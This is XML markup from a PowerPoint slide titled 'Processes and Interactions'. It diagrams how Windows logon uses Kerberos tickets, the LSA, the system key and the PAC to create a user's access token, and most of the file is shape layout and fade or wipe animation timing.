                <a:rPr lang="de-DE" sz="1400" dirty="0"/>
                <a:t>Workstation</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="45" name="TextBox 44"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3042793" y="2110989"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>User Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="TextBox 49"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3053209" y="4714991"/>
              <a:ext cx="2567940" cy="184666"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="1200" dirty="0"/>
                <a:t>Workstation Credential Cache</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="51" name="Picture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3573" y="1655743"/>
              <a:ext cx="566691" cy="526075"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>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87630" y="1741553"/>
            <a:ext cx="2700684" cy="3743013"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="63" name="TextBox 62"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307331" y="1840836"/>
            <a:ext cx="2567940" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>LSA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="64" name="TextBox 63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6307332" y="2084202"/>
            <a:ext cx="2567940" cy="184666"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>Session Ticket</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6954398" y="2451622"/>
            <a:ext cx="1468864" cy="687368"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="2000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>Session Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="2000"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>User Credentials</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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618771" y="2884820"/>
            <a:ext cx="225134" cy="308918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 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0497" y="2409518"/>
            <a:ext cx="311866" cy="311866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="68" name="Content Placeholder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75107" y="3526411"/>
            <a:ext cx="338649" cy="338649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69" name="Picture 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680470" y="4209251"/>
            <a:ext cx="225134" cy="308918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Picture 6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25877" y="4900884"/>
            <a:ext cx="534319" cy="293983"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="71" name="TextBox 70"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7013756" y="3412501"/>
            <a:ext cx="1368152" cy="1846659"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>+</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>System Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>User Credentials in Ticket + Local SIDs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0"/>
              <a:t>User’s Access Token</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="Down Arrow 58"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7629591" y="3859082"/>
            <a:ext cx="136482" cy="19126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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="60" name="Down Arrow 59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7629591" y="4599798"/>
            <a:ext cx="136482" cy="19126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de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="75" name="Picture 7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65203" y="1916770"/>
            <a:ext cx="189855" cy="278996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="16"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5. Creating a user access token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Content Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="395536" y="1212428"/>
            <a:ext cx="7924800" cy="2031325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In order to be able to </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>login, the TGS is </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>decrypted with the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>system key and the </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PAC is used to create </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>the access token</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Processes and Interactions</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="46" name="Picture 4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98846" y="2384864"/>
            <a:ext cx="327713" cy="327713"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="TextBox 46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639949" y="2409801"/>
            <a:ext cx="1789823" cy="2062103"/>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Ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>Ticket-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0" err="1"/>
              <a:t>Granting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t> Service Session Key</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Service Ticket</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>Session Key</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="48" name="Content Placeholder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24296" y="4955394"/>
            <a:ext cx="338649" cy="338649"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="49" name="TextBox 48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3639949" y="4993594"/>
            <a:ext cx="1715503" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="1500"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" sz="1400" dirty="0"/>
              <a:t>System Key</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>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66919" y="2825658"/>
            <a:ext cx="472016" cy="312696"/>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208473" y="3251435"/>
            <a:ext cx="348452" cy="348452"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="42" name="Picture 4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232367" y="4162165"/>
            <a:ext cx="380199" cy="375562"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Picture 4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179789" y="3763083"/>
            <a:ext cx="472180" cy="312804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="Rectangle 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3562359" y="5522263"/>
            <a:ext cx="1418769" cy="43462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t>Winlogon</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="54" name="Curved Connector 53"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5046161" y="2721384"/>
            <a:ext cx="1479716" cy="1192552"/>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55" name="Curved Connector 54"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5040796" y="3695735"/>
            <a:ext cx="1529701" cy="1418813"/>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56" name="Curved Connector 55"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="5040796" y="5047874"/>
            <a:ext cx="1403412" cy="685381"/>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2766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0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">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nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="30" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">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500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="53"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="37" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="38" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">
                                            <p:txEl>
                                              <p:pRg st="2" end="2"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="39" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">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xEl>
                                              <p:pRg st="3" end="3"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="47" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">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nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">
                                            <p:txEl>
                                              <p:pRg st="4" end="4"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="47">
                                            <p:txEl>
                                              <p:pRg st="4" end="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fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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fade">
                                      <p:cBhvr>
                                        <p:cTn id="63" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="68" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="54"/>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64"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="72" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="73" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="74" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="75"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="75" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="7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67"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="65"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="66"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="86" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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55"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(left)">
                                      <p:cBhvr>
                                        <p:cTn id="91" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="55"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffec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68"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="95" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="96" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="97" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="98" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="99" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="0" end="0"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="100" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="101" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="102" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="103" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71">
                                            <p:txEl>
                                              <p:pRg st="1" end="1"/>
                                            </p:txEl>
                                          </p:spTgt>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="104" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="105" presetID="22" presetClass="entr" presetSubtype="1" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="106" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="wipe(up)">
                                      <p:cBhvr>
                                        <p:cTn id="107" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="59"/>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69"/>
